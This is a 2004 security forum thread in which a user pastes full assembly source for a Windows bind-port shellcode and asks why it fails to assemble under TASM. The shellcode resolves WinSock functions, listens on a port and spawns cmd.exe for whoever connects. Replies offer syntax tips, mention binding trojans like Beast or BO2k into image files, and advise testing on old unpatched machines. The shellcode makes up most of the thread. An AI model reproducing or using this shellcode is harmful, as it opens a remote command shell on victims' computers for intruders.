-
November 9th, 2004, 09:39 AM
#1
Senior Member
exploits and asm :getting started.
phrack 6.2's article on advances in windows overflow http://phrack.org/show.php?p=62&a=7
is great some really advance topics covered by it gives u examples on how to procede and source code available on http://www.scan-associates.net/papers/one-way.zip
i am new at asm never enjoyed it to be honest but in one-way.zip file there are source code in asm for shell codes here is one of those source codes:::
----------------------------------------------------------
;bind to port shellcode
;port at 0x134
;sk scan-associates net
.386p
locals
.model flat, stdcall
.code
start:
db 0ebh,02 ;jmp $+2
db 0ebh, 05h ;jmp $+5
db 0e8h, 0f9h,0ffh,0ffh,0ffh ;call $-7
pop eax
add eax, 1bh
lea esp,[eax-3ffh]
and esp, 0fffffffch
mov ebp,esp
xor ecx,ecx
mov cx,399 ;size
decode:
xor byte ptr [eax], 0
inc eax
loop decode
call here
db "GetProcAddress",0,"LoadLibraryA",0
db "CreateProcessA",0,"ExitProcess",0
db "ws2_32",0,"WSASocketA",0
db "bind",0,"listen",0,"accept",0
db "cmd",0
;Warning! This will not work in Win2k SP4! Check reverse.asm for a better trick to get Kernel32
here:
pop edx
push edx
mov ebx,77F00000h
l1:
cmp dword ptr [ebx],905A4Dh ;/x90ZM
je l2
;db 74h,03h
dec ebx
jmp l1
l2:
mov esi,dword ptr [ebx+3Ch]
add esi,ebx
mov esi,dword ptr [esi+78h]
add esi,ebx
mov edi,dword ptr [esi+20h]
add edi,ebx
mov ecx,dword ptr [esi+14h]
push esi
xor eax,eax
l4:
push edi
push ecx
mov edi,dword ptr [edi]
add edi,ebx
mov esi,edx
xor ecx,ecx
;GetProcAddress
mov cl,0Eh
repe cmps byte ptr [esi],byte ptr [edi]
pop ecx
pop edi
je l3
add edi,4
inc eax
loop l4
jmp ecx
l3:
pop esi
mov edx,dword ptr [esi+24h]
add edx,ebx
shl eax,1
add eax,edx
xor ecx,ecx
mov cx,word ptr [eax]
mov eax,dword ptr [esi+1Ch]
add eax,ebx
shl ecx,2
add eax,ecx
mov edx,dword ptr [eax]
add edx,ebx
pop esi
mov edi,esi
xor ecx,ecx
;Get 3 Addr
mov cl,3
call loadaddr
add esi,0Ch
;Load ws2_32
push edx
push esi
call dword ptr [edi-0Ch] ;LoadLibraryA
pop edx
mov ebx,eax
xor ecx,ecx
mov cl,4
call loadaddr
add esi,7
xor eax,eax
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
call dword ptr [edi-16] ;WSASocketA
cmp eax,0FFFFFFFFh
je exit
;bind, listen, accept
mov ebx,eax
mov word ptr [ebp],2
mov word ptr [ebp+2],5000h ;port
mov dword ptr [ebp+4], 0 ;IP
push 10h
push ebp
push ebx
call dword ptr [edi-12] ;bind
test eax,eax
jne exit
inc eax
push eax
push ebx
call dword ptr [edi-8] ;listen (soc, 1);
test eax,eax
jne exit
push eax
push eax
push ebx
call dword ptr [edi-4] ;accept
cmp eax,0FFFFFFFFh
je exit
mov ebx,eax
xor eax,eax
xor ecx,ecx
mov cl,11h
push edi
mov edi,ebp
rep stos dword ptr [edi]
pop edi
mov byte ptr [ebp],44h
mov dword ptr [ebp+3Ch],ebx
mov dword ptr [ebp+38h],ebx
mov dword ptr [ebp+40h],ebx
mov word ptr [ebp+2Ch],0101h
lea eax,[ebp+44h]
push eax
push ebp
push ecx
push ecx
push ecx
inc ecx
push ecx
dec ecx
push ecx
push ecx
push esi
push ecx
call dword ptr [edi-24] ;CreateProcess
exit:
push eax
call dword ptr [edi-20] ;ExitProcess
loadaddr:
mov al,byte ptr [esi]
inc esi
test al,al
jne loadaddr
push ecx
push edx
push esi
push ebx
call edx
pop edx
pop ecx
stosd
loop loadaddr
ret
end start
.data
----------------------------------------------------------
it is supposed to be used with TASM i have windows 98 and XP installed tasm on 98 and tried all of these source codes tried to create obj file but it doesn't work can anyone suggest why?
may be it will work fine on linux but what if i want to convert this to windows or dos format.
-
November 9th, 2004, 09:42 AM
#2
Bleh I'm prolly acting like a dick like this because it's late and I hate ASM but: this should really be in programming security. Anyways, that phrack article (to my knowledge) is old and outdated and the exploit you directed to might even be patched (probably is).
-
November 9th, 2004, 09:46 AM
#3
Senior Member
i don't care whether it is patched or not i just want to learn
-
November 9th, 2004, 09:50 AM
#4
Indeed, I'm thrilled your looking to learn ASM and whatnot. However reading outdated/old material isn't the way to go, no? Search AO and google for some ASM tutorials (as a matter of fact, AO might have some links to some programming tutorial sites that are updated and aren't outdated.. I can't remember any off the top of my head right now).
-
November 9th, 2004, 10:02 AM
#5
Senior Member
i did that i am starting with asm.got some cool links from google tried art of assembly and so on.
as far this thread is concerned i just wanted to know why i am not being able to run it with TASM in win98?
-
November 9th, 2004, 10:13 AM
#6
/me wishes he could help you with that one, but can't because me dont use/code with ASM.
-
November 9th, 2004, 02:18 PM
#7
Oliver's Law:
Experience is something you don't get until just after you need it.
-
November 9th, 2004, 03:18 PM
#8
Originally posted here by SirDice
Any error messages?
Huhaha... nice joke, SirDice. That was a good one.
Well for starters and among various other potential problems, when you declare byte(s) of text like that it should be
.data
db "blah blah random text", 0
It should go to the .data section of your source which is at the bottom of your post, the text is somewhere in the top/middle area of it all ... which really stuff like .data, .data?, .const, and (ect) this would all normaly be prepared, declared, ready, & done before you begin the .code portion of the source code. Oh yeah and Spyder, kiss my ass! Go do something lame and imaginary like bind a *.jpg file with beast or BO2k servers.
Originally posted here by Spyder32
No doubt. You most like FIND viruses inside of a .jpg file because it's harder to detect and/or wouldn't be thought of as containing a virus. Their are specific binding applications out there designed to bind two files together, specifically a .jpg and a .exe. Hope that provided some insight for you.
-
November 9th, 2004, 07:13 PM
#9
littlenick,
i don't care whether it is patched or not i just want to learn
Well you ought to care. If the machine is patched then the exploit won't work, and if it is your primary computer that you use to access the net it certainly should be patched. Or you will certainly learn.......the hard way!!!
You need to get yourself an old box, PI/PII or even a later 486. Load an UNPATCHED version of an OS such as Win NT4 or Win98. Then try your experiments. Then gradually apply the patches and see what they do.
You certainly don't want to be doing this sort of research on your main machine............things can go wrong.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|